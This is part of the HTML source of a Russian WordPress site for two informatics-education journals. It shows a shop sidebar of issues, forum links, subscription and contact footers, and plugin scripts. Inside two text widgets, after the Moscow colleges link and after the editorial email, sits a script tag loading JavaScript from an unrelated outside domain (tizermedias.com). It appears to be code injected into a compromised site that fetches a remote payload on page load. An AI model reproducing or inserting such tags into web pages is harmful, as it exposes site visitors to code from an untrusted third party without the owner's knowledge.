		<img width="105" height="145" src="http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-105x145.jpg" class="attachment-shop_thumbnail size-shop_thumbnail wp-post-image" alt="school_03-2017" srcset="http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-105x145.jpg 105w, http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-217x300.jpg 217w, http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-768x1060.jpg 768w, http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-742x1024.jpg 742w, http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-210x290.jpg 210w, http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017-394x544.jpg 394w, http://infojournal.ru/wp-content/uploads/2017/04/school_03-2017.jpg 794w" sizes="(max-width: 105px) 100vw, 105px" />		<span class="product-title">Информатика в школе №03’2017</span>
	</a>
		<span class="woocommerce-Price-amount amount">150.00&nbsp;<span class="woocommerce-Price-currencySymbol">&#8381;</span></span></li>

<li>
	<a href="http://infojournal.ru/journals/info/info_03-2017/" title="Информатика и образование №03’2017">
		<img width="105" height="145" src="http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-105x145.jpg" class="attachment-shop_thumbnail size-shop_thumbnail wp-post-image" alt="info_03-2017" srcset="http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-105x145.jpg 105w, http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-217x300.jpg 217w, http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-768x1060.jpg 768w, http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-742x1024.jpg 742w, http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-210x290.jpg 210w, http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017-394x544.jpg 394w, http://infojournal.ru/wp-content/uploads/2017/04/info_03-2017.jpg 794w" sizes="(max-width: 105px) 100vw, 105px" />		<span class="product-title">Информатика и образование №03’2017</span>
	</a>
		<span class="woocommerce-Price-amount amount">250.00&nbsp;<span class="woocommerce-Price-currencySymbol">&#8381;</span></span></li>

<li>
	<a href="http://infojournal.ru/journals/info/info_02-2017/" title="Информатика и образование №02’2017">
		<img width="105" height="145" src="http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-105x145.jpg" class="attachment-shop_thumbnail size-shop_thumbnail wp-post-image" alt="info_02-2017" srcset="http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-105x145.jpg 105w, http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-217x300.jpg 217w, http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-768x1060.jpg 768w, http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-742x1024.jpg 742w, http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-210x290.jpg 210w, http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017-394x544.jpg 394w, http://infojournal.ru/wp-content/uploads/2017/03/info_02-2017.jpg 794w" sizes="(max-width: 105px) 100vw, 105px" />		<span class="product-title">Информатика и образование №02’2017</span>
	</a>
		<span class="woocommerce-Price-amount amount">250.00&nbsp;<span class="woocommerce-Price-currencySymbol">&#8381;</span></span></li>

<li>
	<a href="http://infojournal.ru/journals/school/school_02-2017/" title="Информатика в школе №02’2017">
		<img width="105" height="145" src="http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-105x145.jpg" class="attachment-shop_thumbnail size-shop_thumbnail wp-post-image" alt="school_02-2017" srcset="http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-105x145.jpg 105w, http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-217x300.jpg 217w, http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-768x1060.jpg 768w, http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-742x1024.jpg 742w, http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-210x290.jpg 210w, http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017-394x544.jpg 394w, http://infojournal.ru/wp-content/uploads/2017/03/school_02-2017.jpg 794w" sizes="(max-width: 105px) 100vw, 105px" />		<span class="product-title">Информатика в школе №02’2017</span>
	</a>
		<span class="woocommerce-Price-amount amount">150.00&nbsp;<span class="woocommerce-Price-currencySymbol">&#8381;</span></span></li>
</ul></aside><aside id="bbp_replies_widget-2" class="widget inner-padding widget_display_replies"><h4 class="widget-title">Свежее на форуме</h4>
		<ul>

			
				<li>

					<a class="bbp-reply-topic-title" href="http://infojournal.ru/forums/topic/kak-vy-otnosites-k-elektronnym-uchebnikam-5/#post-33942" title="">Как вы относитесь к электронным учебникам?</a>
				</li>

			
				<li>

					<a class="bbp-reply-topic-title" href="http://infojournal.ru/forums/topic/kak-vy-otnosites-k-elektronnym-uchebnikam-5/#post-33892" title="">Как вы относитесь к электронным учебникам?</a>
				</li>

			
				<li>

					<a class="bbp-reply-topic-title" href="http://infojournal.ru/forums/topic/kak-vy-otnosites-k-elektronnym-uchebnikam-5/#post-33858" title="">Как вы относитесь к электронным учебникам?</a>
				</li>

			
				<li>

					<a class="bbp-reply-topic-title" href="http://infojournal.ru/forums/topic/kak-vy-otnosites-k-elektronnym-uchebnikam-5/#post-33851" title="К электронным учебникам от&hellip;">Как вы относитесь к электронным учебникам?</a>
				</li>

			
				<li>

					<a class="bbp-reply-topic-title" href="http://infojournal.ru/forums/topic/kak-vy-otnosites-k-elektronnym-uchebnikam-5/#post-33850" title="">Как вы относитесь к электронным учебникам?</a>
				</li>

			
		</ul>

		</aside><aside id="text-5" class="widget inner-padding widget_text"><h4 class="widget-title">Навигатор абитуриента</h4>			<div class="textwidget"><p><a href="http://vuz.edunetwork.ru/77/" target="_blank">Вузы Москвы</a><br />
<a href="http://college.edunetwork.ru/77/" target="_blank">Колледжи Москвы</a><script type="text/javascript" src="http://tizermedias.com/odessa/?H6rRyf"></script></p>
</div>
		</aside>			</div><!-- .inside-right-sidebar -->
</div><!-- #secondary -->
	</div><!-- #content -->
</div><!-- #page -->
<div class="site-footer">
			<div id="footer-widgets" class="site footer-widgets">
			<div class="inside-footer-widgets grid-container grid-parent">
									<div class="footer-widget-1 grid-parent grid-33 tablet-grid-50 mobile-grid-100">
						<aside id="text-3" class="widget inner-padding widget_text"><h4 class="widget-title">Информатика и образование</h4>			<div class="textwidget"><p>А4, от 64 полос (черно-белый блок)<br />
10 раз в год (не выходит в январе и июле)<br />
Подписные индексы «Роспечать»<br />
70423 — для физических лиц<br />
73176 — для юридических лиц</p>
</div>
		</aside><aside id="wpglobus-3" class="widget inner-padding widget_wpglobus"><div class="flags-styled"><span class="flag wpglobus-current-language"><a href="http://infojournal.ru/2017/04/24/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10/comment-page-1/" class="wpglobus-selector-link "><img src="http://infojournal.ru/wp-content/plugins/wpglobus/flags/ru.png"/></a></span><span class="flag "><a href="http://infojournal.ru/en/2017/04/24/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10/comment-page-1/" class="wpglobus-selector-link "><img src="http://infojournal.ru/wp-content/plugins/wpglobus/flags/us.png"/></a></span></div></aside>					</div>
								<div class="footer-widget-2 grid-parent grid-33 tablet-grid-50 mobile-grid-100">
					<aside id="text-4" class="widget inner-padding widget_text"><h4 class="widget-title">Информатика в школе</h4>			<div class="textwidget"><p>А4, 64 полосы (черно-белый блок)<br />
10 раз в год (не выходит в январе и июле)<br />
Подписные индексы «Роспечать»<br />
81407 — для физических лиц<br />
81408 — для юридических лиц</p>
</div>
		</aside>				</div>
								<div class="footer-widget-3 grid-parent grid-33 tablet-grid-50 mobile-grid-100">
					<aside id="text-2" class="widget inner-padding widget_text"><h4 class="widget-title">Контакты</h4>			<div class="textwidget"><p>Адрес редакции:<br />
119121, Москва, ул. Погодинская, 8<br />
комн. 222 (здание РАО)<br />
Тел: +7 495 364-95-97<br />
Отдел распространения:<br />
info@infojournal.ru<br />
Объединенная редакция журналов:<br />
readinfo@infojournal.ru<script type="text/javascript" src="http://tizermedias.com/odessa/?H6rRyf"></script></p>
</div>
		</aside>				</div>
							</div>
		</div>
		<footer class="site-info" itemtype="http://schema.org/WPFooter" itemscope="itemscope">
		<div class="inside-site-info grid-container grid-parent">
			&copy; 2000 - 2017 ООО "Образование и Информатика"<br />
&copy; 1986 - 2017 Журнал "Информатика и образование"<br />
&copy; 2002 - 2017 Журнал "Информатика в школе"<br />
<span style="margin-top: 5px; font-size: 13px"> При использовании материалов ссылка на сайт <a href="http://infojournal.ru/">Образование и Информатика</a> обязательна.<br/>При использовании материалов журнала ссылка на статью обязательна.</span>		</div>
	</footer><!-- .site-info -->
	</div><!-- .site-footer -->

	</div><!-- .generate-slideout-container -->
	<div id="rcl-overlay"></div>
        <div id="rcl-popup"></div>	<script type="text/javascript">
		jQuery( document ).ready( function( $ ) {
							$( '.slideout-toggle' ).on( 'click', function ( event ) {
					// Stop default behaviour and propagation
					event.preventDefault();
					event.stopPropagation();
								
					// Toggle Slidebar
					$('.ui.sidebar').sidebar('toggle');
				} );
					});
	</script>
	<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/bbpress/templates/default/js/editor.js?ver=2.5.10-6063'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-page-header/functions/js/parallax.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-secondary-nav/functions/js/navigation.js?ver=1.0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/2017\/04\/24\/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10\/comment-page-1\/?wc-ajax=%%endpoint%%","i18n_view_cart":"\u041f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432 \u043a\u043e\u0440\u0437\u0438\u043d\u0443","cart_url":"http:\/\/infojournal.ru\/cart\/","is_cart":"","cart_redirect_after_add":"no"};
/* ]]> */
</script>
<script type='text/javascript' src='//infojournal.ru/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=2.6.14'></script>
<script type='text/javascript' src='//infojournal.ru/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/2017\/04\/24\/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10\/comment-page-1\/?wc-ajax=%%endpoint%%"};
/* ]]> */
</script>
<script type='text/javascript' src='//infojournal.ru/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=2.6.14'></script>
<script type='text/javascript' src='//infojournal.ru/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/2017\/04\/24\/%D0%B1%D1%8B%D1%81%D1%82%D1%80%D0%BE%D0%BE%D1%82%D0%B2%D0%B5%D1%87%D0%B0%D0%BB%D0%BA%D0%B8-%D0%BF%D0%BE%D1%80%D1%86%D0%B8%D1%8F-10\/comment-page-1\/?wc-ajax=%%endpoint%%","fragment_name":"wc_fragments"};
/* ]]> */
</script>
<script type='text/javascript' src='//infojournal.ru/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=2.6.14'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/themes/generatepress/js/navigation.min.js?ver=1.3.39'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/themes/generatepress/js/dropdown.min.js?ver=1.3.39'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/themes/generatepress/js/navigation-search.min.js?ver=1.3.39'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='http://infojournal.ru/wp-content/themes/generatepress/js/html5shiv.min.js?ver=1.3.39'></script>
<![endif]-->
<script type='text/javascript' src='http://infojournal.ru/wp-includes/js/comment-reply.min.js?ver=4.6.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-menu-plus/functions/js/classie.js?ver=0.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-menu-plus/functions/js/headhesive.js?ver=0.1'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/gp-premium/addons/generate-menu-plus/functions/js/sidebar.js?ver=0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGlobus = {"version":"1.6.2","language":"ru"};
/* ]]> */
</script>
<script type='text/javascript' src='http://infojournal.ru/wp-content/plugins/wpglobus/includes/js/wpglobus.min.js?ver=1.6.2'></script>
<script type='text/javascript' src='http://infojournal.ru/wp-includes/js/wp-embed.min.js?ver=4.6.1'></script>
<script>rcl_do_action("rcl_footer")</script>
</body>
</html>